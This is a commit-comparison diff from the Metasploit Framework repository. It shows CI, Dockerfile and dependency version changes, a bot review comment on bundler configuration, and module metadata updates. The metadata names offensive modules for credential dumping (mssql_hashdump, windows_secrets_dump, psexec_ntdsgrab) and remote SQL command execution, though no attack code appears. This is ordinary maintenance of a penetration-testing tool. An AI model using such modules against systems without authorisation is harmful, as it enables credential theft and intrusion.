Compare commits
218 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| a1a0df74eb | |||
| aefebd996a | |||
| 0aa20c73a4 | |||
| cc565a1731 | |||
| 82c2eb9899 | |||
| 7b618d4f41 | |||
| bf1608a4ad | |||
| f70667124f | |||
| d21e4080a9 | |||
| b79790cff6 | |||
| 06b3004af4 | |||
| a30a7f81e5 | |||
| e288592beb | |||
| 901a972a71 | |||
| 4fcb4a4e3a | |||
| 768ad16d8c | |||
| 175d584ff7 | |||
| 200d03c417 | |||
| a3d8b0f77a | |||
| e66f6c106b | |||
| 3be5988679 | |||
| 2cc8281db7 | |||
| c2a217efcd | |||
| 5735c7cb89 | |||
| 6db865a46c | |||
| b2f36e41c4 | |||
| 66696d201b | |||
| db3b2de3f3 | |||
| 0108f1f214 | |||
| de17261926 | |||
| 64ab62f2c3 | |||
| ca367bc87b | |||
| 19c1a35592 | |||
| 8cddffa3d1 | |||
| eef29a5100 | |||
| bc6bf1c4f3 | |||
| a1b0ff0fcf | |||
| fc963bd8bb | |||
| 94f0d243c7 | |||
| da9164fcc6 | |||
| 90ed3cd00a | |||
| 0e98da39c2 | |||
| bbe1098b13 | |||
| e15fd1a782 | |||
| 6c252de974 | |||
| 7b56d012e8 | |||
| 40701bf59a | |||
| 8dcb409d25 | |||
| 1d9a08f405 | |||
| e49c6a792a | |||
| 8e3daa5179 | |||
| 1d406cfc2a | |||
| d716e60cf2 | |||
| f5c71d09c2 | |||
| 8b70cefd83 | |||
| 996ca8a7c9 | |||
| f75722ecf2 | |||
| dde7e3c5d3 | |||
| eafdb8495b | |||
| d5f30befbb | |||
| 3db32da70f | |||
| 5f703b2e28 | |||
| eca99e2c77 | |||
| 27ccb26de1 | |||
| a75013e51a | |||
| d987b81591 | |||
| 7228a2ad20 | |||
| 747d328bcb | |||
| fa5c4c0193 | |||
| 0d4e1ed755 | |||
| 587a8690a1 | |||
| 08872d0211 | |||
| 0f319bdfb9 | |||
| df81cda304 | |||
| 3447ca37ea | |||
| fc5a12431c | |||
| bd78f03c98 | |||
| 0d250c49fa | |||
| 2409d132ae | |||
| 1794a5fbee | |||
| d18520adc6 | |||
| 9b4d6f1219 | |||
| cb290d8032 | |||
| c05c6773df | |||
| 1cd5b707bb | |||
| 49e689d909 | |||
| 9c6e1a584a | |||
| 423bf0c519 | |||
| 34a8b6c29c | |||
| 94005719f4 | |||
| ef54cfd0f3 | |||
| b762d2ba65 | |||
| d49f60282c | |||
| 202db99004 | |||
| 793f3557a2 | |||
| 45365c8666 | |||
| ce0498377d | |||
| 8eb5aa6aa6 | |||
| 88e1e2e932 | |||
| 84f4c3c13f | |||
| 9e456a27e3 | |||
| 8717e91a3c | |||
| d67aa2e250 | |||
| 982f92b9b6 | |||
| 8106dbe5e0 | |||
| 450fd0876f | |||
| 43eb2a7c9b | |||
| 69eaf75b7a | |||
| b40f36e62a | |||
| a90ff41f71 | |||
| 2f4a1ac300 | |||
| 7e5938061c | |||
| f9fb803af7 | |||
| 5fa1ce8ed2 | |||
| 3cf3d0995e | |||
| 699afaff45 | |||
| 5d165466ff | |||
| 5036d28b44 | |||
| 94223f05fc | |||
| 1d2acd67e4 | |||
| 285fbe5ac5 | |||
| c1df6f2647 | |||
| dc47d03503 | |||
| 72932bdae1 | |||
| 37ee910d2f | |||
| 0c83ad46aa | |||
| 30fc29e0f5 | |||
| 9caa2fac17 | |||
| 99b2bfec1f | |||
| 2c60780dc0 | |||
| 1f292c8a73 | |||
| 1b2a2af4d4 | |||
| 56d2dfa46a | |||
| 934b10a626 | |||
| 630301a0df | |||
| 1cab98f4c2 | |||
| 62e960352f | |||
| 243ebcb3a6 | |||
| c1a08b97d2 | |||
| 11ca24e290 | |||
| 5c9b454291 | |||
| 2653a180e4 | |||
| 648a7b394d | |||
| bd7d4f0099 | |||
| fcd84a41aa | |||
| d940bfd312 | |||
| 2cf706e91f | |||
| 43a7993215 | |||
| 470a28921e | |||
| 3c716041bd | |||
| 3445c1b588 | |||
| a5dc63617f | |||
| 464d2eef73 | |||
| 7fe10d8613 | |||
| 282f97ba2d | |||
| 319cff7d3a | |||
| fd943f1401 | |||
| c780bfcb66 | |||
| 20f73867ca | |||
| 6fdfd7147c | |||
| 9181d93807 | |||
| 87e78d4f8d | |||
| 0625e84b57 | |||
| 8b71afdd53 | |||
| d3bde6b172 | |||
| 02ae96edb0 | |||
| b060809a8d | |||
| 4b5d04e59e | |||
| ccb446f2ae | |||
| 436efad4ca | |||
| 47d30696bc | |||
| 84278b8e0e | |||
| e80f0ef8cd | |||
| 03a58c784b | |||
| 367783bcb5 | |||
| 29524fa7f8 | |||
| 23e184c9ce | |||
| 577304cf7c | |||
| ae1cb57dc3 | |||
| bed552d26e | |||
| 2a4d50c6e7 | |||
| 1c334ad670 | |||
| e5b5f12a4e | |||
| 2efbf6e2f5 | |||
| 44916e67d5 | |||
| 3d476f4ef3 | |||
| b9cf7ba894 | |||
| 1c36d89942 | |||
| c9504f9c53 | |||
| 96316a94fe | |||
| b5906418c2 | |||
| 33306fa4dd | |||
| a8c240f671 | |||
| 4cb18483d6 | |||
| d20ef7a08b | |||
| bcefde29c3 | |||
| d7cf9155a6 | |||
| 5a14575a31 | |||
| 6de51a5047 | |||
| 077cad34ab | |||
| 6d298c379b | |||
| a4e8714de6 | |||
| a09cf6471a | |||
| 2ab1b7a310 | |||
| 4e106c2a73 | |||
| 6ba5d03993 | |||
| 672d651221 | |||
| 70c69f46a5 | |||
| 7876912eab | |||
| ea189d6c34 | |||
| 1a3b00e593 | |||
| 6972a910fb | |||
| 6b5fff6c33 | |||
| 05d6e9815d | |||
| 79d3cc81cb | |||
| 8e33badd80 | |||
| 823824163e | |||
| e3c97148e8 |
@@ -38,6 +38,7 @@ on:
|
||||
- 'lib/msf/core/**'
|
||||
- 'tools/dev/**'
|
||||
- 'spec/acceptance/**'
|
||||
- 'spec/support/acceptance/**'
|
||||
- 'spec/acceptance_spec_helper.rb'
|
||||
# Example of running as a cron, to weed out flaky tests
|
||||
# schedule:
|
||||
|
||||
@@ -74,9 +74,6 @@ jobs:
|
||||
exclude:
|
||||
- { os: ubuntu-latest, ruby: '3.0' }
|
||||
include:
|
||||
- os: ubuntu-latest
|
||||
ruby: '3.1'
|
||||
test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" MSF_FEATURE_DATASTORE_FALLBACKS=1'
|
||||
- os: ubuntu-latest
|
||||
ruby: '3.1'
|
||||
test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" MSF_FEATURE_DEFER_MODULE_LOADS=1'
|
||||
|
||||
+6
-2
@@ -1,7 +1,8 @@
|
||||
FROM ruby:3.1.4-alpine3.18 AS builder
|
||||
LABEL maintainer="Rapid7"
|
||||
|
||||
ARG BUNDLER_CONFIG_ARGS="set clean 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
|
||||
ARG BUNDLER_CONFIG_ARGS="set no-cache 'true' set system 'true' set without 'development test coverage'"
|
||||
ARG BUNDLER_FORCE_CLEAN="true"
|
||||
ENV APP_HOME=/usr/src/metasploit-framework
|
||||
ENV TOOLS_HOME=/usr/src/tools
|
||||
ENV BUNDLE_IGNORE_MESSAGES="true"
|
||||
@@ -33,8 +34,11 @@ RUN apk add --no-cache \
|
||||
go \
|
||||
&& echo "gem: --no-document" > /etc/gemrc \
|
||||
&& gem update --system \
|
||||
&& bundle config $BUNDLER_ARGS \
|
||||
&& bundle config $BUNDLER_CONFIG_ARGS \
|
||||
&& bundle install --jobs=8 \
|
||||
&& if [ "${BUNDLER_FORCE_CLEAN}" == "true" ]; then \
|
||||
bundle clean --force; \
|
||||
fi \
|
||||
# temp fix for https://github.com/bundler/bundler/issues/6680
|
||||
&& rm -rf /usr/local/bundle/cache \
|
||||
# needed so non root users can read content of the bundle
|
||||
|
||||
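Review bot: In the second hunk, `bundle config $BUNDLER_CONFIG_ARGS` (taken as the added line from the hunk counts) expands the ARG unquoted, so the single quotes inside its value reach bundler as literal characters and all three `set …` groups arrive as arguments of a single `bundle config` call. Whether bundler then applies `without 'development test coverage'` is not visible here; if it does not, development and test gems end up in the built image. Consider one call per setting, `&& bundle config set no-cache 'true' \`, `&& bundle config set system 'true' \`, `&& bundle config set without 'development test coverage' \`, or at least print the effective settings in the build log to confirm them. The new guard `[ "${BUNDLER_FORCE_CLEAN}" == "true" ]` uses `==`, which POSIX `test` does not define; `=` is the portable spelling: `if [ "${BUNDLER_FORCE_CLEAN}" = "true" ]; then \`. The RUN instruction starts above and continues below this hunk.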
+5
-5
@@ -1,7 +1,7 @@
|
||||
PATH
|
||||
remote: .
|
||||
specs:
|
||||
metasploit-framework (6.3.55)
|
||||
metasploit-framework (6.3.57)
|
||||
actionpack (~> 7.0.0)
|
||||
activerecord (~> 7.0.0)
|
||||
activesupport (~> 7.0.0)
|
||||
@@ -33,7 +33,7 @@ PATH
|
||||
metasploit-concern
|
||||
metasploit-credential
|
||||
metasploit-model
|
||||
metasploit-payloads (= 2.0.165)
|
||||
metasploit-payloads (= 2.0.166)
|
||||
metasploit_data_models
|
||||
metasploit_payloads-mettle (= 1.0.26)
|
||||
mqtt
|
||||
@@ -265,7 +265,7 @@ GEM
|
||||
activesupport (~> 7.0)
|
||||
railties (~> 7.0)
|
||||
zeitwerk
|
||||
metasploit-credential (6.0.6)
|
||||
metasploit-credential (6.0.7)
|
||||
metasploit-concern
|
||||
metasploit-model
|
||||
metasploit_data_models (>= 5.0.0)
|
||||
@@ -279,7 +279,7 @@ GEM
|
||||
activemodel (~> 7.0)
|
||||
activesupport (~> 7.0)
|
||||
railties (~> 7.0)
|
||||
metasploit-payloads (2.0.165)
|
||||
metasploit-payloads (2.0.166)
|
||||
metasploit_data_models (6.0.3)
|
||||
activerecord (~> 7.0)
|
||||
activesupport (~> 7.0)
|
||||
@@ -419,7 +419,7 @@ GEM
|
||||
metasm
|
||||
rex-core
|
||||
rex-text
|
||||
rex-socket (0.1.55)
|
||||
rex-socket (0.1.56)
|
||||
rex-core
|
||||
rex-sslscan (0.1.10)
|
||||
rex-core
|
||||
|
||||
+4
-4
@@ -79,10 +79,10 @@ macaddr, 1.7.2, ruby
|
||||
memory_profiler, 1.0.1, MIT
|
||||
metasm, 1.0.5, LGPL-2.1
|
||||
metasploit-concern, 5.0.2, "New BSD"
|
||||
metasploit-credential, 6.0.6, "New BSD"
|
||||
metasploit-framework, 6.3.55, "New BSD"
|
||||
metasploit-credential, 6.0.7, "New BSD"
|
||||
metasploit-framework, 6.3.57, "New BSD"
|
||||
metasploit-model, 5.0.2, "New BSD"
|
||||
metasploit-payloads, 2.0.165, "3-clause (or ""modified"") BSD"
|
||||
metasploit-payloads, 2.0.166, "3-clause (or ""modified"") BSD"
|
||||
metasploit_data_models, 6.0.3, "New BSD"
|
||||
metasploit_payloads-mettle, 1.0.26, "3-clause (or ""modified"") BSD"
|
||||
method_source, 1.0.0, MIT
|
||||
@@ -149,7 +149,7 @@ rex-powershell, 0.1.99, "New BSD"
|
||||
rex-random_identifier, 0.1.11, "New BSD"
|
||||
rex-registry, 0.1.5, "New BSD"
|
||||
rex-rop_builder, 0.1.5, "New BSD"
|
||||
rex-socket, 0.1.55, "New BSD"
|
||||
rex-socket, 0.1.56, "New BSD"
|
||||
rex-sslscan, 0.1.10, "New BSD"
|
||||
rex-struct2, 0.1.4, "New BSD"
|
||||
rex-text, 0.2.53, "New BSD"
|
||||
|
||||
@@ -16,6 +16,8 @@ services:
|
||||
enabled: yes
|
||||
- type: IMAP
|
||||
enabled: yes
|
||||
- type: LDAP
|
||||
enabled: yes
|
||||
- type: MSSQL
|
||||
enabled: yes
|
||||
- type: MySQL
|
||||
|
||||
@@ -0,0 +1,188 @@
|
||||
[
|
||||
{
|
||||
"name": "v0.7.1",
|
||||
"commit": {
|
||||
"sha": "56fa824510d8a35b08e3b42bf6625c846e2ed5a0"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.7.0",
|
||||
"commit": {
|
||||
"sha": "fdd9ad94c11d44259ef26bf4b2dc9a8bd139f607"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.6.2",
|
||||
"commit": {
|
||||
"sha": "b0c367cac7211117e88a55517396764036ac0552"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.6.1",
|
||||
"commit": {
|
||||
"sha": "ef0dacb0c36a1a180ef8fda670c82854658aab00"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.6.0",
|
||||
"commit": {
|
||||
"sha": "e72f6d6d5dd078df2d270cc48a4087588443f89a"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.5.0",
|
||||
"commit": {
|
||||
"sha": "027d9b4653e2f3ea13d4de6a0b2bd568106ffb40"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.4.0",
|
||||
"commit": {
|
||||
"sha": "521ba0cb2f63110eb2ed13a7054a4d70238a862a"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.3.3",
|
||||
"commit": {
|
||||
"sha": "38c4cf7dd9275294348bab903be9dc12eafe37dd"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.3.2",
|
||||
"commit": {
|
||||
"sha": "9d9d31a6694ab1fc12da20ea18fa5a778ce5a631"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.3.1",
|
||||
"commit": {
|
||||
"sha": "e75c251013845f1921ea75c24b44fd7164ee398d"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.3.0",
|
||||
"commit": {
|
||||
"sha": "9606d7ee5ab3b8056b4a69610ae79b7b473d779d"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.2.1",
|
||||
"commit": {
|
||||
"sha": "da29a200cd8ec46da709e0523787479ac6fb274b"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.2.0",
|
||||
"commit": {
|
||||
"sha": "2e345f6f6caeb3495f6454bfaa5a10bf50639411"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.1.0",
|
||||
"commit": {
|
||||
"sha": "1869a7f0a85ceaa707ea25866da98a3ac5a0667e"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.0.10",
|
||||
"commit": {
|
||||
"sha": "f08970c1d8910091a392d26b51db33b5c99a0f81"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.0.9",
|
||||
"commit": {
|
||||
"sha": "f98abfb79dc2c437f1b6cb5f534da560c85c5406"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.0.8",
|
||||
"commit": {
|
||||
"sha": "222cf2c65189c97877491c7bcc6fc14982ce65d7"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.0.7",
|
||||
"commit": {
|
||||
"sha": "2a743a5bf4b27a6cc9cb857bd178c2e724d98821"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.0.6",
|
||||
"commit": {
|
||||
"sha": "f6253b6bfaa249236ac1b4f0505f4b7af8f89116"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.0.5",
|
||||
"commit": {
|
||||
"sha": "abae56b3d0d2383d0351280213236cd988fd6d28"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.0.4",
|
||||
"commit": {
|
||||
"sha": "4190d76f2fefb65cb898f6c648e932b2c1a5fba3"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.0.3",
|
||||
"commit": {
|
||||
"sha": "8057dc123f23f6da9752d712edeb5e7e490b648c"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.0.2",
|
||||
"commit": {
|
||||
"sha": "f5bb336a75351379dad289b73a85f6ebf8ff5498"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "v0.0.1",
|
||||
"commit": {
|
||||
"sha": "ed08f278f95dca46e58e24a13923939d268eedd3"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "charts/kafka-ui-0.7.1",
|
||||
"commit": {
|
||||
"sha": "c998e17e8322a867c02ef4cdf577aa33c2d3a81e"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "charts/kafka-ui-0.7.0",
|
||||
"commit": {
|
||||
"sha": "78cc4dd981a89b26006fea0984f1305bc663281f"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "charts/kafka-ui-0.6.2",
|
||||
"commit": {
|
||||
"sha": "838fb604d569dae18a1a7a85ef28ed2c125df986"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "charts/kafka-ui-0.6.1",
|
||||
"commit": {
|
||||
"sha": "4a1e987a1d2a958119ab5c936d4b1d82125e14d9"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "charts/kafka-ui-0.6.0",
|
||||
"commit": {
|
||||
"sha": "f2a2574ddc8bbe20776071569935922c3593d5e7"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "charts/kafka-ui-0.5.4",
|
||||
"commit": {
|
||||
"sha": "334ba3df99dfc84385faace167f6410c8ce0be91"
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "charts/kafka-ui-0.5.3",
|
||||
"commit": {
|
||||
"sha": "cbb166026d8c6360836def9bf9c208313023961c"
|
||||
}
|
||||
}
|
||||
]
|
||||
@@ -88,6 +88,7 @@ strtab:
|
||||
db 0
|
||||
db 0
|
||||
strtabsz equ $ - strtab
|
||||
|
||||
align 16
|
||||
global _start
|
||||
_start:
|
||||
|
||||
|
||||
Binary file not shown.
+4238
-577
@@ -6775,7 +6775,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2017-08-16 21:40:03 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/admin/mssql/mssql_enum.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/mssql/mssql_enum",
|
||||
@@ -6784,7 +6784,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mssql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -6825,7 +6827,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-12-12 09:53:37 +0000",
|
||||
"mod_time": "2024-02-13 13:00:38 +0000",
|
||||
"path": "/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/mssql/mssql_enum_domain_accounts",
|
||||
@@ -6974,7 +6976,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-12-12 09:53:37 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/mssql/mssql_escalate_dbowner",
|
||||
@@ -6983,7 +6985,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mssql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -7073,7 +7077,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2020-09-22 02:56:51 +0000",
|
||||
"mod_time": "2024-02-14 15:26:34 +0000",
|
||||
"path": "/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/mssql/mssql_escalate_execute_as",
|
||||
@@ -7082,7 +7086,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mssql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -7174,7 +7180,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2021-04-12 14:48:25 +0000",
|
||||
"mod_time": "2024-02-14 15:26:34 +0000",
|
||||
"path": "/modules/auxiliary/admin/mssql/mssql_exec.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/mssql/mssql_exec",
|
||||
@@ -7183,7 +7189,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mssql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -7228,7 +7236,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-07 15:02:53 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/mssql/mssql_findandsampledata",
|
||||
@@ -7237,7 +7245,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mssql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -7277,7 +7287,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2022-06-29 12:20:37 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/admin/mssql/mssql_idf.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/mssql/mssql_idf",
|
||||
@@ -7286,7 +7296,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mssql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -7427,7 +7439,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2017-08-24 21:38:44 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/admin/mssql/mssql_sql.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/mssql/mssql_sql",
|
||||
@@ -7436,7 +7448,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mssql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -7476,7 +7490,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2017-08-24 21:38:44 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/admin/mssql/mssql_sql_file.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/mssql/mssql_sql_file",
|
||||
@@ -7485,7 +7499,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mssql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -7517,7 +7533,7 @@
|
||||
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2017-07-24 06:26:21 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/admin/mysql/mysql_enum.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/mysql/mysql_enum",
|
||||
@@ -7526,7 +7542,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mysql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -7558,7 +7576,7 @@
|
||||
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2017-07-24 06:26:21 +0000",
|
||||
"mod_time": "2024-02-14 15:26:34 +0000",
|
||||
"path": "/modules/auxiliary/admin/mysql/mysql_sql.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/mysql/mysql_sql",
|
||||
@@ -7567,7 +7585,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mysql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -8990,7 +9010,7 @@
|
||||
"postgres"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-07 15:02:53 +0000",
|
||||
"mod_time": "2024-02-14 15:26:34 +0000",
|
||||
"path": "/modules/auxiliary/admin/postgres/postgres_readfile.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/postgres/postgres_readfile",
|
||||
@@ -8999,7 +9019,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"postgresql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -9031,7 +9053,7 @@
|
||||
"postgres"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2017-08-24 21:38:44 +0000",
|
||||
"mod_time": "2024-02-14 15:26:34 +0000",
|
||||
"path": "/modules/auxiliary/admin/postgres/postgres_sql.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/postgres/postgres_sql",
|
||||
@@ -9040,7 +9062,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"postgresql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -9956,7 +9980,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-11-27 13:29:43 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/admin/smb/delete_file.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/smb/delete_file",
|
||||
@@ -9966,7 +9990,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -10001,7 +10025,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-11-27 14:25:47 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/admin/smb/download_file.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/smb/download_file",
|
||||
@@ -10011,7 +10035,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -10149,7 +10173,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-15 12:07:07 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/smb/psexec_ntdsgrab",
|
||||
@@ -10159,7 +10183,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -10240,7 +10264,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-11-27 14:55:24 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/admin/smb/upload_file.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "admin/smb/upload_file",
|
||||
@@ -10250,7 +10274,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -22828,7 +22852,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-12-12 09:53:37 +0000",
|
||||
"mod_time": "2024-02-13 13:00:38 +0000",
|
||||
"path": "/modules/auxiliary/gather/lansweeper_collector.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "gather/lansweeper_collector",
|
||||
@@ -25902,7 +25926,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-15 12:07:07 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/auxiliary/gather/windows_secrets_dump.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "gather/windows_secrets_dump",
|
||||
@@ -25921,7 +25945,7 @@
|
||||
]
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
@@ -46634,7 +46658,7 @@
|
||||
"sybase"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2023-12-12 09:53:37 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/auxiliary/scanner/mssql/mssql_hashdump.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/mssql/mssql_hashdump",
|
||||
@@ -46643,7 +46667,9 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"session_types": [
|
||||
"mssql"
|
||||
],
|
||||
"needs_cleanup": false,
|
||||
"actions": [
|
||||
|
||||
@@ -46683,7 +46709,7 @@
|
||||
